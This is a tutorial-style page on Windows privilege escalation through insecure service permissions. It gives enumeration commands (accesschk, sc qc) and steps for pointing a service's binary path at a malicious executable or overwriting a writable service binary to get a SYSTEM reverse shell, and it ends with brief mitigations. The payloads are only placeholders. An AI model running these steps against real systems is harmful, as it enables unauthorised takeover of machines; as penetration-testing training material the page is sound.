Attacks - Windows Privilege Escalation

Service Exploits - Insecure Service Permissions

TL;DR

Use accesschk.exe to check if the current user has permission to modify the target service configuration:

accesschk.exe /accepteula -uwcqv <username> <service-name>

Look for permissions such as SERVICE_CHANGE_CONFIG, which indicate that the user can modify the service’s configuration.

Retrieve the service details to check its privileges (e.g., whether it runs as SYSTEM) and identify its current binary path:

sc qc <service-name>

Note the SERVICE_START_NAME (privileged account) and BINARY_PATH_NAME (path to the service executable).

Change the service’s binary path to point to a malicious executable (e.g., a reverse shell payload):

sc config <service-name> binpath= "\"C:\path\to\malicious.exe\""

Ensure the binary path is enclosed in quotes to avoid path issues.

Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:

net start <service-name>

What is Insecure Service Permissions

Insecure Service Permissions refer to weak or misconfigured permissions on Windows services that can allow an attacker to escalate privileges. These misconfigurations often enable unauthorized users to modify, stop, start, or replace services, leading to potential exploitation.

How Services Work in Windows

Windows services run in the background to perform specific functions and often have high privileges, such as SYSTEM. Services are controlled by the Service Control Manager (SCM) and their configurations are stored in the Windows Registry under:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

Types of Insecure Service Permissions

- Write Permissions on Service Executable

If a service executable can be overwritten by a low-privileged user, they can replace it with a malicious binary. When the service restarts, the malicious binary will execute with the service’s privileges (often SYSTEM).

- Modify Permissions on Service Configuration

Low-privileged users may be able to modify service properties, such as:

  • Binary Path: Altering the path to point to a malicious executable.
  • Start Type: Enabling auto-start to persist the attack.

- Weak ACLs (Access Control Lists)

Misconfigured ACLs may allow unauthorized users to control the service using tools like sc.exe or PowerShell.

Exploitation Steps

1. Enumeration

Use tools like sc.exe, PowerShell, or third-party scripts to identify misconfigured services:

  • sc qc <service-name>: Displays the configuration of a service.
  • accesschk.exe: A tool from Sysinternals to check permissions on services.
accesschk.exe -uwcqv "Users" *

Tools like WinPEAS can automate this process.

2. Exploiting Weak Permissions

If you find a service with insecure permissions: Replace the executable file with your malicious file (if writable).

echo "Your payload" > "C:\path\to\service.exe"

Modify the service configuration using sc.exe:

sc config <service-name> binPath= "C:\path\to\malicious.exe"
sc start <service-name>

3. Escalating Privileges

Once the service executes your payload, you’ll gain the privileges associated with that service, typically SYSTEM.

Example: Replacing a Writable Executable

Enumerate the services and locate one with a writable executable path:

Use accesschk.exe to identify writable service executables. Example: C:\Program Files\Service\service.exe is writable by the user.

Replace the executable:

echo "Your malicious code here" > "C:\Program Files\Service\service.exe"

Restart the service:

sc stop <service-name>
sc start <service-name>

Confirm you’ve escalated privileges:

whoami

Mitigation for Insecure Service Permissions

  • Use proper Access Control Lists (ACLs) to restrict access to services.
  • Regularly audit service configurations and permissions.
  • Use tools like accesschk or PowerShell scripts to verify permissions.
  • Avoid assigning writable permissions to non-admin users on service executables or registry keys.